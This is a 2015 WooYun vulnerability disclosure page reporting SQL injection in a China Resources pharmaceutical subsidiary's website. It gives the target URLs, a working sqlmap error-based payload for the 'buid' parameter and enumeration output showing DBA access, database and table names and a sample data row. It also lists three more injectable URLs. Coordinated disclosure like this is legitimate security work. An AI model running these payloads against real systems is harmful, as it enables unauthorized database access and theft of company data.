当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135085

漏洞标题:华润医药旗下某公司存在多处SQL注入漏洞,泄露企业重要信息

相关厂商:华润三九医药股份有限公司

漏洞作者: XTT

提交时间:2015-08-18 18:56

修复时间:2015-10-03 15:22

公开时间:2015-10-03 15:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

公司存在多处SQL注入漏洞,严重影响数据安全性。

详细说明:

注入点:

http://www.crsdyy.com/sdgs/index.asp?buid=3701000110


---
Parameter: buid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
current user:    'sa'
current user is DBA:    True

漏洞证明:

---
Parameter: buid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [9]:
[*] master
[*] model
[*] msdb
[*] sdgs
[*] shxt
[*] sjcj
[*] sjzl
[*] syxh
[*] tempdb


---
Parameter: buid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: sdgs
[25 tables]
+----------------+
| biuser_bak     |
| bulist         |
| download       |
| download_type  |
| fwl            |
| gysuser        |
| ip             |
| link           |
| lxjl           |
| medicine_type  |
| news           |
| news_type      |
| product        |
| pt_user        |
| qyfc           |
| qyxchz         |
| qyxcmx         |
| sqlmapoutput   |
| sysuser        |
| v_search       |
| zhaoshang      |
| zhaoshang_oid  |
| zhaoshang_type |
| zlzx           |
| zlzx_type      |
+----------------+


---
Parameter: buid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: master
[301 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS              |
| INFORMATION_SCHEMA.COLUMNS                        |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE            |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES              |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE        |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE         |
| INFORMATION_SCHEMA.DOMAINS                        |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS             |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE               |
| INFORMATION_SCHEMA.PARAMETERS                     |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS        |
| INFORMATION_SCHEMA.ROUTINES                       |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                |
| INFORMATION_SCHEMA.SCHEMATA                       |
| INFORMATION_SCHEMA.TABLES                         |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS              |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES               |
| INFORMATION_SCHEMA.VIEWS                          |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE              |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE               |
| MSreplication_options                             |
| dj_ls                                             |
| djbh                                              |
| djhz                                              |
| djmx                                              |
| kh_doc                                            |
| sp_doc                                            |
| spt_fallback_db                                   |
| spt_fallback_dev                                  |
| spt_fallback_usg                                  |
| spt_monitor                                       |
| spt_values                                        |
| userlist                                          |
| v_dj_ls                                           |
| v_rkmx                                            |
| sys.all_columns                                   |
| sys.all_objects                                   |
| sys.all_parameters                                |
| sys.all_sql_modules                               |
| sys.all_views                                     |
+---------------------------------------------------+


---
Parameter: buid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: sjcj
[81 tables]
+----------+
| aslk1    |
| becc1    |
| beyy1    |
| bjhh01   |
| bjhs01   |
| bjhs1    |
| bjnh1    |
| bjnhobu1 |
| bjsh1    |
| blg01    |
| blkxy01  |
+-----------


---
Parameter: buid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: sjcj
Table: aslk1
[1 entry]
+--------+------------+---------------------+---------+----------+---------+
| makeno | rq         | warename            | wareqty | wareunit | 公司名称    |
+--------+------------+---------------------+---------+----------+---------+
| XCWZ   | 2015-08-17 | 注射用奥美拉唑钠(静脉滴注)(洛赛克) | 96.0000 | 支        | <blank> |
+--------+------------+---------------------+---------+----------+---------+


重要信息还很多,数据就不一一跑了~
其他注入点一起送上:

http://www.crsdyy.com/sdgs/index.asp?buid=3701000106
http://www.crsdyy.com/sdgs/index.asp?buid=3701000107
http://www.crsdyy.com/sdgs/index.asp?buid=3701000108

修复方案:

版权声明:转载请注明来源 XTT@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-19 15:20

厂商回复:

sa权限,又是分分钟打进内网的节奏,哎!!已通知药业集团

最新状态:

暂无